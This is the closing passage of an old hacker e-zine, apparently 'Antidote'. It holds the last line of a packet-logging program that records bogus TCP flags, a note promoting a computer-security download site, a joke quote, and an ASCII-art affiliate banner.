syslog(LEVEL, "bogus tcp flags set by %s (%s)", hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)), inet_ntoa(hdr.ip.ip_src));
}
antirez
------------------------------
-)!-- 3.00 - Misc //--(-
We have no misc things, please submit them.
We have been working hard on Security Source/Embryonic Project. If you go to our site
(www.thepoison.org), you will notice a new layout not dedicated to hacking but dedicat-
ed to computer security.
Security Source/Embryonic Project has over 4,000 programs, exploits tutorials and other
misc things for you to view and download. Most of these files are located at our new
subdomain because we don't have the time to upload and make "fancy" webpages for all of
the content so our new subdomain is basic/typical HTML. It can be located at:
http://browse.thepoison.org
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #6- .
. .
. *JP stands up* .
. "Hi, my name is JP and I am addicted to lying." .
. *Everyone claps and JP sits down* .
. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
